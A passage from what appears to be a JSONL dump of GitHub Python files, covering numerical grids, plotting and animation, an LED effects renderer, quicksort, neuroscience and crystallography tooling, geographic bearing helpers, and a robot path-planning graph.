\"\n \"Inputs are nx number of points(including end point) and Length the length\" \n \n def __init__(self, nx, Length , xmin=0.0):\n \n self.xmin = xmin\n self.length =np.float64(Length)\n self.xmax = xmin + Length \n self.nx = int(nx)\n # The x locations, including the end point\n self.x = np.linspace(self.xmin, self.length, self.nx)\n # The dx length of the partition\n self.dx =self.x[1]-self.x[0]\n \n\n\n","repo_name":"ESaggioro/FinalCode","sub_path":"Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2852536803","text":"import matplotlib as mpl\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation, rc, cm\nfrom IPython.display import HTML\nimport mpl_toolkits.mplot3d.axes3d as p3\n\ndef animate(xx, yy, u):\n \n mpl.rcParams['figure.dpi']= 120 # Animation Size\n rc('animation', html='html5')\n z_max = np.max(np.max(u))\n def update_lines(num, u, N, frames):\n\n print(\"%i / 50 Frames loaded\" %(num+1), end='\\r')\n ax.clear()\n ax.set_zlim3d([0.0, z_max])\n line = ax.plot_surface(xx,yy,u[int(N/frames)*num], cmap=cm.coolwarm)\n return line,\n \n fig = plt.figure()\n ax = p3.Axes3D(fig)\n plt.close()\n line = ax.plot_surface(xx,yy,u[0])\n \n # Animation Parameters\n N = np.size(u[:,0,0]) # Number of Timesteps\n T = 5\n if N<50:\n frames = N\n else:\n frames = 50 # Number of Frames\n \n interval = T/frames*1000 # Time between Frames in ms\n \n ax.set_zlim3d([0.0, z_max])\n anim = animation.FuncAnimation(fig, update_lines,fargs = (u, N, frames),\n frames=frames, interval=interval, blit=True)\n return anim\n","repo_name":"AaronStra/BEC","sub_path":"ani_bose_2d.py","file_name":"ani_bose_2d.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2445087954","text":"import asyncio\n\nfrom abc import abstractmethod\nfrom typing import NamedTuple\n\nfrom traitlets import Bool, CaselessStrEnum, HasTraits, Float, Int, observe, Unicode\n\nfrom uchroma.blending import BlendOp\nfrom uchroma.input_queue import InputQueue\nfrom uchroma.layer import Layer\nfrom uchroma.log import Log\nfrom uchroma.traits import ColorTrait, DefaultCaselessStrEnum, WriteOnceInt\nfrom uchroma.util import Ticker\n\n\nMAX_FPS = 30\nDEFAULT_FPS = 15\nNUM_BUFFERS = 2\n\n\nRendererMeta = NamedTuple('RendererMeta', [('display_name', str), ('description', str),\n ('author', str), ('version', str)])\n\n\n\nclass Renderer(HasTraits, object):\n \"\"\"\n Base class for custom effects renderers.\n \"\"\"\n\n # traits\n meta = RendererMeta('_unknown_', 'Unimplemented', 'Unknown', '0')\n\n fps = Float(min=0.0, max=MAX_FPS, default_value=DEFAULT_FPS).tag(config=True)\n blend_mode = DefaultCaselessStrEnum(BlendOp.get_modes(), default_value='screen',\n allow_none=False).tag(config=True)\n opacity = Float(min=0.0, max=1.0, default_value=1.0).tag(config=True)\n background_color = ColorTrait().tag(config=True)\n\n height = WriteOnceInt()\n width = WriteOnceInt()\n zindex = Int(default_value=-1)\n running = Bool(False)\n\n\n def __init__(self, driver, *args, **kwargs):\n self._avail_q = asyncio.Queue(maxsize=NUM_BUFFERS)\n self._active_q = asyncio.Queue(maxsize=NUM_BUFFERS)\n\n self.running = False\n\n self.width = driver.width\n self.height = driver.height\n\n self._tick = Ticker(1 / DEFAULT_FPS)\n\n self._input_queue = None\n if hasattr(driver, 'input_manager') and 
driver.input_manager is not None:\n self._input_queue = InputQueue(driver)\n\n self._logger = Log.get('uchroma.%s.%d' % (self.__class__.__name__, self.zindex))\n super(Renderer, self).__init__(*args, **kwargs)\n\n\n @observe('zindex')\n def _z_changed(self, change):\n if change.old == change.new and change.new >= 0:\n return\n\n self._logger = Log.get('uchroma.%s.%d' % (self.__class__.__name__, change.new))\n\n\n def init(self, frame) -> bool:\n \"\"\"\n Invoked by AnimationLoop when the effect is activated. At this\n point, the traits will have been set. An implementation\n should perform any final setup here.\n\n :param frame: The frame instance being configured\n\n :return: True if the renderer was configured\n \"\"\"\n return False\n\n\n def finish(self, frame ):\n \"\"\"\n Invoked by AnimationLoop when the effect is deactivated.\n An implementation should perform cleanup tasks here.\n\n :param frame: The frame instance being shut down\n \"\"\"\n pass\n\n\n @abstractmethod\n async def draw(self, layer: Layer, timestamp: float) -> bool:\n \"\"\"\n Coroutine called by AnimationLoop when a new frame needs\n to be drawn. If nothing should be drawn (such as if keyboard\n input is needed), then the implementation should yield until\n ready.\n\n :param layer: Layer to draw\n :param timestamp: The timestamp of this frame\n\n :return: True if the frame has been drawn\n \"\"\"\n return False\n\n\n @property\n def has_key_input(self) -> bool:\n \"\"\"\n True if the device is capable of producing key events\n \"\"\"\n return self._input_queue is not None\n\n\n @property\n def key_expire_time(self) -> float:\n \"\"\"\n Gets the duration (in seconds) that key events will remain\n available.\n \"\"\"\n return self._input_queue.expire_time\n\n\n @key_expire_time.setter\n def key_expire_time(self, expire_time: float):\n \"\"\"\n Set the duration (in seconds) that key events should remain\n in the queue for. This allows the renderer to act on groups\n of key events over time. If zero, events are not kept after\n being dequeued.\n \"\"\"\n self._input_queue.expire_time = expire_time\n\n\n async def get_input_events(self):\n \"\"\"\n Gets input events, yielding until at least one event is\n available. If expiration is not enabled, this returns\n a single item. Otherwise a list of all unexpired events\n is returned.\n \"\"\"\n if not self.has_key_input or not self._input_queue.attach():\n raise ValueError('Input events are not supported for this device')\n\n events = await self._input_queue.get_events()\n return events\n\n\n @observe('fps')\n def _fps_changed(self, change):\n self._tick.interval = 1 / self.fps\n\n\n @property\n def logger(self):\n \"\"\"\n The logger for this instance\n \"\"\"\n return self._logger\n\n\n def _free_layer(self, layer):\n \"\"\"\n Clear the layer and return it to the queue\n\n Called by AnimationLoop after a layer is replaced on the\n active list. 
Implementations should not call this directly.\n \"\"\"\n layer.lock(False)\n layer.clear()\n self._avail_q.put_nowait(layer)\n\n\n async def _run(self):\n \"\"\"\n Coroutine which dequeues buffers for drawing and queues them\n to the AnimationLoop when drawing is done.\n \"\"\"\n if self.running:\n return\n\n self.running = True\n\n while self.running:\n async with self._tick:\n # get a buffer, blocking if necessary\n layer = await self._avail_q.get()\n layer.background_color = self.background_color\n layer.blend_mode = self.blend_mode\n layer.opacity = self.opacity\n\n try:\n # draw the layer\n status = await self.draw(layer, asyncio.get_event_loop().time())\n except Exception as err:\n self.logger.exception(\"Exception in renderer, exiting now!\", exc_info=err)\n self.logger.error('Renderer traits: %s', self._trait_values)\n break\n\n if not self.running:\n break\n\n # submit for composition\n if status:\n layer.lock(True)\n await self._active_q.put(layer)\n\n await self._stop()\n\n\n def _flush(self):\n if self.running:\n return\n for qlen in range(0, self._avail_q.qsize()):\n self._avail_q.get_nowait()\n for qlen in range(0, self._active_q.qsize()):\n self._active_q.get_nowait()\n\n\n async def _stop(self):\n if not self.running:\n return\n\n self.running = False\n\n self._flush()\n\n if self.has_key_input:\n await self._input_queue.detach()\n\n self.logger.info(\"Renderer stopped: z=%d\", self.zindex)\n","repo_name":"cyanogen/uchroma","sub_path":"uchroma/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"67"} +{"seq_id":"34302768634","text":"def quicksort(x):\n \"\"\"\n Sorts the given list, returns a new list with all objects in order\n\n :param x: List to be sorted\n :type x: list\n :rtype : list\n \"\"\"\n\n assert isinstance(x, list), \"input should be a list\"\n\n def _choose_pivot(m_list, left, right):\n \"\"\"\n Chooses a pivot index in the given (restricted) list using the best of 3 method\n\n :return: index of chosen pivot\n \"\"\"\n front = m_list[left]\n back = m_list[right]\n mid = m_list[(right+1-left)//2]\n\n if mid <= front <= back or back <= front <= mid:\n return left\n if front <= mid <= back or back <= mid <= front:\n return (right+1-left)//2\n return right\n\n def _partition(m_list, p, left, right):\n \"\"\"\n Partitions m_list and returns an index i such that all items left of index i are <= m_list[i], and all\n items to the right of index i are >= m_list[i]. 
(We don't consider anything before left or after right)\n\n :param m_list: List to be partitioned\n :param p: index of pivot to be used\n :return: new index of the pivot\n \"\"\"\n m_list[p], m_list[right] = m_list[right], m_list[p] # swap pivot to the end\n i = left\n j = right-1\n v = m_list[right]\n while True:\n while i < right and m_list[i] <= v:\n i += 1\n while j > left and m_list[j] >= v:\n j -= 1\n if i >= j:\n break\n m_list[i], m_list[j] = m_list[j], m_list[i]\n m_list[i], m_list[right] = m_list[right], m_list[i] # swap pivot back to \"middle\"\n return i\n\n def _sort(m_list, left, right):\n if left >= right:\n return\n pivot_index = _choose_pivot(m_list, left, right)\n i = _partition(m_list, pivot_index, left, right)\n _sort(m_list, left,i-1)\n _sort(m_list, i+1, right)\n\n # This is my first attempt - inefficient use of space\n\n # def _sort(m_list):\n # if len(m_list) < 2:\n # return m_list\n # # initialize new lists and make the middle to be the pivot\n # pivot = m_list[len(m_list) // 2]\n # smaller, same, larger = [], [], []\n # for i in range(len(m_list)):\n # if m_list[i] < pivot:\n # smaller.append(m_list[i])\n # elif m_list[i] > pivot:\n # larger.append(m_list[i])\n # else:\n # same.append(m_list[i])\n #\n # return _sort(smaller) + same + _sort(larger)\n\n _sort(x, 0, len(x)-1)\n","repo_name":"HavinLeung/Data-Structures-Algorithms","sub_path":"Algorithms/Sorting/QuickSort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12032882722","text":"\"\"\"plot_traces.py\nBEFORE RUNNING THIS: run count_backwards.py\n\n1. Plot traces for each fly averaged throughout the iterations\n (`glob_ = False`).\n2. 
Plot traces averaged throughtout the iterations and flies for each gene\n (`glob_ = True`).\n\"\"\"\n\nimport torch\nimport glob\nfrom matplotlib import pyplot as plt\n\ndata_folder = \"data/orig/\"\npics_folder = \"pics/\"\n\ntitles = [\"ImpTNT\", \"GFP\", \"ShalRNAi\", \"Dorsal\", \"TNT\", \"EagDN\", \"Hunchback\"]\n\nglob_ = True\n\nwith plt.style.context(\"bmh\"):\n # For each gene\n for i in range(7):\n fname = next(\n glob.iglob(data_folder + \"{:02}*/fly_moves.pt\".format(i + 1)))\n\n # Size: N_flies x N_iters x N_frames\n fly_moves = torch.load(fname).type(torch.float)\n\n c_1 = list(plt.rcParams['axes.prop_cycle'])[1]['color']\n c_2 = list(plt.rcParams['axes.prop_cycle'])[8]['color']\n\n plt.fill_between(range(40, 91), -1, 1, alpha=0.2, color=c_2)\n\n plt.axhline(0, 0, 120, c=\"gray\", linewidth=1.0, linestyle='--')\n\n if glob_:\n mean = fly_moves.mean(1).mean(0).numpy()[2:-8]\n std = fly_moves.std(1).mean(0).numpy()[2:-8]\n #print(len(mean))\n\n plt.plot(mean, c=c_1)\n\n plt.fill_between(\n range(len(mean)),\n mean - std, mean + std,\n alpha=0.1, color=c_1\n )\n plt.plot(mean - std, c=c_1, linewidth=0.7, alpha=0.3)\n plt.plot(mean + std, c=c_1, linewidth=0.7, alpha=0.3)\n\n else:\n for j in range(fly_moves.size(0)):\n mean = fly_moves.mean(1)[j].numpy()[2:-8]\n std = fly_moves.std(1)[j].numpy()[2:-8]\n #print(len(mean))\n\n plt.plot(mean, label=j)\n\n \"\"\"\n plt.fill_between(\n range(len(mean)),\n mean - std, mean + std,\n alpha=0.1, color=c_1)\n plt.plot(mean - std, c=c_1, linewidth=0.7, alpha=0.3)\n plt.plot(mean + std, c=c_1, linewidth=0.7, alpha=0.3)\n \"\"\"\n\n plt.ylim(-1, 1)\n locs, labels = plt.yticks(\n [-0.5, 0, 0.5], [\"Backward\", \"Still\", \"Forward\"], rotation=90)\n plt.xticks([0, 20, 40, 60, 80, 100], [-4, -2, 0, 2, 4, 6])\n for label in labels:\n label.set_verticalalignment('center')\n\n plt.ylabel(\"Movement\")\n plt.xlabel(\"Seconds\")\n\n if glob_:\n plt.title(titles[i] + \": Global Mean ± Std\")\n else:\n plt.title(titles[i])\n\n #plt.show()\n if glob_:\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \"_glob_avg_std.pdf\", dpi=300)\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \"_glob_avg_std.png\", dpi=300)\n else:\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \".pdf\", dpi=300)\n plt.savefig(pics_folder + str(i) + \"_\" +\n titles[i] + \".png\", dpi=300)\n plt.close()\n","repo_name":"utanashati/cobar-flies","sub_path":"plot_traces.py","file_name":"plot_traces.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39963230872","text":"import os, sys, nose, h5py\nimport circus\nimport subprocess\nimport urllib.request, urllib.error, urllib.parse\nimport unittest\nimport colorama\ncolorama.init(autoreset=True)\nfrom colorama import Fore, Back, Style\nimport shutil\nimport pkg_resources\nfrom circus.shared.utils import *\nfrom circus.shared.parser import CircusParser\n \n\ndef run():\n dirname = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\n # We write to stderr since nose does all of its output on stderr as well\n sys.stderr.write('Running tests in \"%s\" ' % dirname)\n success = []\n argv = ['nosetests', dirname]\n success.append(nose.run(argv=argv))\n all_success = all(success)\n if not all_success:\n sys.stderr.write(('ERROR: %d/%d test suite(s) did not complete '\n 'successfully (see above).\\n') % (len(success) - sum(success),\n len(success)))\n else:\n sys.stderr.write(('OK: %d/%d test suite(s) 
did complete '\n 'successfully.\\n') % (len(success), len(success)))\n\ndef mpi_launch(subtask, filename, nb_cpu, nb_gpu, use_gpu, output=None, benchmark=None, sim_same_elec=None):\n args = ['mpirun'] \n \n from mpi4py import MPI\n vendor = MPI.get_vendor()\n if vendor[0] == 'Open MPI':\n args = ['mpirun']\n if os.getenv('LD_LIBRARY_PATH'):\n args += ['-x', 'LD_LIBRARY_PATH']\n if os.getenv('PATH'):\n args += ['-x', 'PATH']\n if os.getenv('PYTHONPATH'):\n args += ['-x', 'PYTHONPATH']\n elif vendor[0] == 'Microsoft MPI':\n args = ['mpiexec']\n elif vendor[0] == 'MPICH2':\n mpi_args = ['mpiexec']\n elif vendor[0] == 'MPICH':\n mpi_args = ['mpiexec']\n \n if use_gpu == 'True':\n nb_tasks = str(nb_gpu)\n else:\n nb_tasks = str(nb_cpu)\n\n if subtask in ['merging', 'converting']:\n args += ['-np', nb_tasks,\n 'spyking-circus-subtask',\n subtask, filename, str(nb_cpu), str(nb_gpu), use_gpu, '']\n else:\n if subtask == 'benchmarking':\n if (output is None) or (benchmark is None):\n print(\"To generate synthetic datasets, you must provide output and type\")\n sys.exit(1)\n args += ['-np', nb_tasks,\n 'spyking-circus-subtask',\n subtask, filename, str(nb_cpu), str(nb_gpu), use_gpu, output, benchmark, str(sim_same_elec)]\n else:\n args += ['-np', nb_tasks,\n 'spyking-circus-subtask',\n subtask, filename, str(nb_cpu), str(nb_gpu), use_gpu]\n \n\n subprocess.check_call(args)\n\n\ndef get_dataset(self):\n dirname = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\n filename = os.path.join(dirname, 'data') \n if not os.path.exists(filename):\n os.makedirs(filename)\n result = os.path.join(filename, 'data')\n filename = os.path.join(filename, 'data.dat')\n if not os.path.exists(filename):\n print(\"Generating a synthetic dataset of 4 channels, 1min at 20kHz...\")\n sampling_rate = 20000\n N_total = 4\n gain = 0.5\n data = (gain * numpy.random.randn(sampling_rate * N_total * 1 * 60)).astype(numpy.float32)\n myfile = open(filename, 'w')\n myfile.write(data.tostring())\n myfile.close() \n \n src_path = os.path.abspath(os.path.join(dirname, 'snippet'))\n\n if not os.path.exists(result):\n os.makedirs(result)\n shutil.copy(os.path.join(src_path, 'test.basis.hdf5'), os.path.join(result, 'data.basis.hdf5'))\n shutil.copy(os.path.join(src_path, 'test.templates.hdf5'), os.path.join(result, 'data.templates.hdf5'))\n shutil.copy(os.path.join(src_path, 'test.clusters.hdf5'), os.path.join(result, 'data.clusters.hdf5'))\n\n config_file = os.path.abspath(pkg_resources.resource_filename('circus', 'config.params'))\n file_params = os.path.abspath(filename.replace('.dat', '.params'))\n if not os.path.exists(file_params):\n \n shutil.copyfile(config_file, file_params)\n probe_file = os.path.join(src_path, 'test.prb')\n parser = CircusParser(filename, mapping=probe_file)\n parser.write('data', 'file_format', 'raw_binary')\n parser.write('data', 'data_offset', '0')\n parser.write('data', 'data_dtype', 'float32')\n parser.write('data', 'sampling_rate', '20000')\n parser.write('whitening', 'temporal', 'False')\n parser.write('data', 'mapping', probe_file)\n parser.write('clustering', 'make_plots', 'png')\n parser.write('clustering', 'nb_repeats', '3')\n parser.write('detection', 'N_t', '3')\n parser.write('clustering', 'smart_search', 'False')\n parser.write('clustering', 'max_elts', '10000')\n parser.write('noedits', 'filter_done', 'True')\n parser.write('clustering', 'extraction', 'median-raw')\n\n a, b = os.path.splitext(os.path.basename(filename))\n c, d = os.path.splitext(filename)\n file_out = 
os.path.join(os.path.abspath(c), a)\n\n return filename\n\nif __name__=='__main__':\n run()\n","repo_name":"spyking-circus/spyking-circus","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"67"} +{"seq_id":"520799139","text":"#! /usr/bin/env python3\n# coding=utf-8\n\"\"\"\"\"\"\n\"\"\"\nAuthor: radenz@tropos.de\n\nhelper functions for the geography calculation\n\"\"\"\n\nimport math\n\ndef calculate_initial_angle(pointA, pointB):\n \"\"\"\n Calculates the bearing between two points.\n The formulae used is the following:\n θ = atan2(sin(Δlong).cos(lat2),\n cos(lat1).sin(lat2) − sin(lat1).cos(lat2).cos(Δlong))\n\n source: https://gist.github.com/jeromer/2005586\n\n initial_bearing = math.degrees(initial_bearing)\n compass_bearing = (initial_bearing + 360) % 360\n\n :Parameters:\n - `pointA: The tuple representing the latitude/longitude for the\n first point. Latitude and longitude must be in decimal degrees\n - `pointB: The tuple representing the latitude/longitude for the\n second point. Latitude and longitude must be in decimal degrees\n :Returns:\n The bearing in degrees\n :Returns Type:\n float\n \"\"\"\n if (type(pointA) != tuple) or (type(pointB) != tuple):\n raise TypeError(\"Only tuples are supported as arguments\")\n\n lat1 = math.radians(pointA[0])\n lat2 = math.radians(pointB[0])\n\n diffLong = math.radians(pointB[1] - pointA[1])\n\n x = math.sin(diffLong) * math.cos(lat2)\n y = math.cos(lat1) * math.sin(lat2) - (math.sin(lat1)\n * math.cos(lat2) * math.cos(diffLong))\n\n initial_bearing = math.atan2(x, y)\n\n # Now we have the initial bearing but math.atan2 return values\n # from -180° to + 180° which is not what we want for a compass bearing\n # The solution is to normalize the initial bearing as shown below\n\n #print((math.degrees(initial_bearing) + 360) % 360)\n return initial_bearing\n\n\ndef distance(origin, destination):\n lat1, lon1 = origin\n lat2, lon2 = destination\n radius = 6371 # km\n\n dlat = math.radians(lat2-lat1)\n dlon = math.radians(lon2-lon1)\n a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) \\\n * math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n d = radius * c\n\n return d","repo_name":"martin-rdz/trace_airmass_source","sub_path":"trace_source/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"30428240661","text":"from __future__ import absolute_import, division\nfrom __future__ import print_function\nfrom dxtbx.model.experiment_list import ExperimentList\nfrom dials.util.options import flatten_reflections\nfrom dials.array_family import flex\nfrom dials.command_line.show import beam_centre_mm\nfrom libtbx import phil\nfrom libtbx import easy_run\nfrom libtbx.utils import Sorry\nfrom libtbx.table_utils import simple_table\nimport os\nfrom math import sqrt\n\nhelp_message = \"\"\"\n\nIndex images in a dataset sequentially.\n\nExample::\n\n dev.dials.creep_index indexed.expt strong.refl\n\n\"\"\"\n\nphil_scope = phil.parse(\n \"\"\"\n images_per_block=5\n .type=int\n\n fix_detector_distance=True\n .type=bool\n .help=\"fix the least stable detector parameters for refinement of each\"\n \"small block of images. 
These are Dist, Tau2 and Tau3.\"\n\"\"\"\n)\n\n\nclass Script(object):\n def __init__(self):\n \"\"\"Check script input\"\"\"\n\n import libtbx.load_env\n from dials.util.options import OptionParser\n\n # The script usage\n usage = (\n \"usage: {0} [options] [param.phil] indexed.expt \" \"strong.refl\"\n ).format(libtbx.env.dispatcher_name)\n\n parser = OptionParser(\n usage=usage,\n phil=phil_scope,\n read_reflections=True,\n read_experiments=True,\n check_format=False,\n epilog=help_message,\n )\n\n params, options = parser.parse_args(show_diff_phil=True)\n\n if len(params.input.experiments) != 1:\n raise Sorry(\"Please provide a single experiment list as input\")\n\n self._current_exp_path = params.input.experiments[0].filename\n\n el = params.input.experiments[0].data\n scan = el.scans()\n if len(scan) != 1:\n raise Sorry(\"Currently only a single scan is supported\")\n self._scan = scan[0]\n\n reflections = flatten_reflections(params.input.reflections)\n if len(reflections) > 1:\n raise Sorry(\"Please provide a single reflection table as input\")\n\n self._strong_path = params.input.reflections[0].filename\n self._num_strong = len(params.input.reflections[0].data)\n print(\n \"{0} strong spots read from {1}\".format(self._num_strong, self._strong_path)\n )\n\n self._images_per_block = params.images_per_block\n self._constrain_detector = params.fix_detector_distance\n\n self._all_indexed = None\n return\n\n def _index_current_block(self, job_id, start, stop):\n\n fmt_dic = {\n \"experiments\": self._current_exp_path,\n \"indexed\": self._strong_path,\n \"start\": start,\n \"stop\": stop,\n \"job_id\": job_id,\n }\n\n cmd = (\n \"dials.index {experiments} {indexed} \"\n \"image_range={start},{stop} \"\n \"output.experiments=latest_indexed.expt \"\n \"output.reflections=indexed_{job_id:03d}.refl \"\n \"output.log=None \"\n ).format(**fmt_dic)\n if self._constrain_detector:\n cmd += \" detector.fix=distance\"\n result = easy_run.fully_buffered(command=cmd)\n\n # check if indexing worked\n new_exp_path = \"latest_indexed.expt\"\n indexed_path = \"indexed_{job_id:03d}.refl\".format(**fmt_dic)\n tst = [os.path.exists(e) for e in (new_exp_path, indexed_path)]\n if tst.count(True) != 2:\n return (None, None)\n return new_exp_path, indexed_path\n\n def __call__(self):\n\n # set up variables we need to determine blocks\n first, last = self._scan.get_image_range()\n start = first\n stop = first\n\n # set up table\n header = [\n \"Job\",\n \"Scan\\nrange\",\n \"#Idx\",\n \"Cell\",\n \"Beam centre\\n(fast,slow)\",\n \"Distance\\n(mm)\",\n \"RMSD_X\\n(px)\",\n \"RMSD_Y\\n(px)\",\n \"RMSD_Z\\n(px)\",\n ]\n rows = []\n num_indexed = []\n filelist_lines = []\n job_id = 1\n\n while True:\n\n # finish if we already processed all blocks\n if stop == last:\n break\n\n # keep trying to index, extending the block size looking for success\n nblocks = 1\n while True:\n stop = start + nblocks * self._images_per_block\n # if within one block size from the end, include all images up to the end\n if stop >= last - self._images_per_block:\n stop = last\n new_exp_path, indexed_path = self._index_current_block(\n job_id, start, stop\n )\n # exit if successful indexing\n if [new_exp_path, indexed_path].count(None) == 0:\n break\n # exit if no more data to include\n if stop == last:\n break\n nblocks += 1\n\n # exit if the last job failed\n if new_exp_path is None:\n break\n\n # it worked, so update the pointer to the current model\n self._current_exp_path = new_exp_path\n print(\"Job {0} completed: scan range 
({1},{2})\".format(job_id, start, stop))\n\n # load the indexed results\n el = ExperimentList.from_file(self._current_exp_path, check_format=False)\n assert len(el) == 1\n exp = el[0]\n\n rt = flex.reflection_table.from_file(indexed_path)\n if self._all_indexed is None:\n self._all_indexed = rt\n else:\n rt.experiment_identifiers()[\n 0\n ] = self._all_indexed.experiment_identifiers()[0]\n self._all_indexed.extend(rt)\n\n indexed = rt.select(rt.get_flags(rt.flags.indexed))\n num_indexed.append(len(indexed))\n panel_id, (x, y) = beam_centre_mm(exp.detector, exp.beam.get_s0())\n bc = exp.detector[panel_id].millimeter_to_pixel((x, y))\n indexed_rmsds = self._rmsds(indexed)\n cell = exp.crystal.get_unit_cell().parameters()\n pnl_dists = [p.get_distance() for p in exp.detector]\n rows.append(\n [\n \"{0}\".format(job_id),\n \"({0},{1})\".format(start, stop),\n \"%i\" % num_indexed[-1],\n \"%.2f %.2f %.2f %.2f %.2f %.2f\" % cell,\n \"%.2f %.2f\" % bc,\n (\" \".join([\"%.2f\" % d for d in pnl_dists])),\n \"%.4f\" % indexed_rmsds[0],\n \"%.4f\" % indexed_rmsds[1],\n \"%.4f\" % indexed_rmsds[2],\n ]\n )\n\n # update the scan range in the experiments and save\n for exp in el:\n exp.scan.swap(exp.scan[start:stop])\n el.as_json(\"indexed_{0:03d}.expt\".format(job_id))\n filelist_lines.append(\n \"block{0:03d} indexed_{0:03d}.expt \".format(job_id) + indexed_path\n )\n\n # set up for the next block\n start = stop\n job_id += 1\n\n # print results\n st = simple_table(rows, header)\n print(st.format())\n total_num_indexed = sum(num_indexed)\n print(\n \"{0} indexed reflections out of {1} strong spots ({2:.1f}%)\".format(\n total_num_indexed,\n self._num_strong,\n 100.0 * total_num_indexed / self._num_strong,\n )\n )\n\n # write out the list of files\n print(\"writing out list of experiments and indexed reflections to filelist.txt\")\n with open(\"filelist.txt\", \"w\") as f:\n f.write(\"\\n\".join(filelist_lines))\n f.write(\"\\n\")\n\n # write out the full reflection table of indexed reflections\n print(\"writing out all indexed reflections to all_indexed.refl\")\n self._all_indexed.as_pickle(\"all_indexed.refl\")\n\n def _rmsds(self, reflections):\n \"\"\"calculate unweighted RMSDs for the specified reflections\"\"\"\n\n # Only calculate RMSDs on the reflections used in refinement\n reflections = reflections.select(\n reflections.get_flags(reflections.flags.used_in_refinement)\n )\n x_calc, y_calc, z_calc = reflections[\"xyzcal.px\"].parts()\n x_obs, y_obs, z_obs = reflections[\"xyzobs.px.value\"].parts()\n\n x_resid2 = (x_calc - x_obs) ** 2\n y_resid2 = (y_calc - y_obs) ** 2\n z_resid2 = (z_calc - z_obs) ** 2\n\n resid_x = flex.sum(x_resid2)\n resid_y = flex.sum(y_resid2)\n resid_z = flex.sum(z_resid2)\n n = len(reflections)\n\n rmsds = (sqrt(resid_x / n), sqrt(resid_y / n), sqrt(resid_z / n))\n return rmsds\n\n\nif __name__ == \"__main__\":\n\n run = Script()\n run()\n","repo_name":"dials/dials_scratch","sub_path":"command_line/creep_index.py","file_name":"creep_index.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1984038092","text":"#SINR_mapping\nimport networkx as nx\nimport numpy as np\nfrom numpy.core.numeric import NaN\nimport random\nimport setting\n#Input parameter\n# SINR_Constraint=8\n# D=100\n# Lambda=3\n# destination=20\n# AdaptionSpeed=1\n# UpperBoundMRC=10\nclass GraphRobot:\n\n def __init__(self,vertices):\n self.V=vertices\n self.graph=[]\n self.path=[]\n self.M={}\n 
self.Obstacle=[]\n #self.obstacle(NumofObstacle)\n\n #remove the edge bump into obstacle\n def obstacleAvoidance(self,Obstacle):\n for i in Obstacle:\n self.graph=[[v1,v2,sickness,SINR,edgeLength,MRC] for v1,v2,sickness,SINR,edgeLength,MRC\\\n in self.graph if(v1!=i and v2!=i)]\n\n #remove the edge which exceed MRC upper bound\n def upperbound(self,UpperBoundMRC):\n self.graph=[[v1,v2,sickness,SINR,edgeLength,MRC] for v1,v2,sickness,SINR,edgeLength,MRC\\\n in self.graph if(MRCSINR_Constraint:\n # #self.graph.sickness=float(\"Inf\")\n # self.graph.remove([v1,v2,sickness,SINR,edgeLength,MRC])\n # self.graph.append([v1,v2,float(\"Inf\"),SINR,edgeLength])\n #initialize\n Qfunction=[float(\"Inf\")]*self.V\n Qfunction[src]=0\n #\n costFunction=np.zeros((self.V+1,self.V+1))\n costFunction[:][:]=float(\"Inf\")\n costFunction[src][:]=0\n #\n PathLength=[float(\"Inf\")]*self.V\n PathLength[src]=0\n #\n RETmagnitude=[float(\"Inf\")]*self.V\n RETmagnitude[src]=0\n #\n AccumulatedSINR=[float(\"Inf\")]*self.V\n AccumulatedSINR[src]=0\n #\n #Distance=D\n rho=np.zeros(self.V)\n rhoOld=0\n Parent={}\n Parent[src]=-1\n #\n self.obstacleAvoidance(self.Obstacle)\n self.upperbound(setting.UpperBoundMRC)\n #\n x=0\n count=0\n for _ in range(self.V-1):\n for v1,v2,sickness,SINR,edgeLength,MRC in self.graph:\n #from 0 to v1\n #for x in range(v1+1):\n if(PathLength[v1]+edgeLengthdst:\n print(\"no optimal path\") \n \n #SINR configuration\n def SINR_mapping_Robot(self,state):\n #Edge(self,v1,v2,sickness,SINR,edgeLength,MRC):\n #state==v2\n #g.M[str(state)][]\n #M={'0'#location: (10,2,3,4,5)#SINR values\n for edges in self.graph:\n v2=edges[1]\n edges[3]=self.M[str(state)][v2]\n\n\n #calculate SINR penalty\n def penalty(self,location,IRSnow,SINR_Constraint):\n SINR=self.M[str(IRSnow)][location]\n if(SINR-SINR_Constraint<0):\n return abs(SINR-SINR_Constraint)\n else:\n return 0\n\n\n \n \n\n\n#==================input===============================\n# GraphSize=5\n# NumberofObstacle=0\n# AdaptionSpeed=0\n# Lambda=4\n# g = GraphRobot(GraphSize)\n# #v1,v2,sickness,SINR,edgeLength,MRC \n# g.addEdge(0, 1, 1, 2, 5, 4)\n# g.addEdge(0, 2, 4, 5, 5, 2)\n# g.addEdge(1, 2, 3, 3, 5, 3)\n# g.addEdge(1, 3, 2, 6, 5, 4)\n# g.addEdge(1, 4, 2, 2, 5, 5)\n# g.addEdge(2, 3, 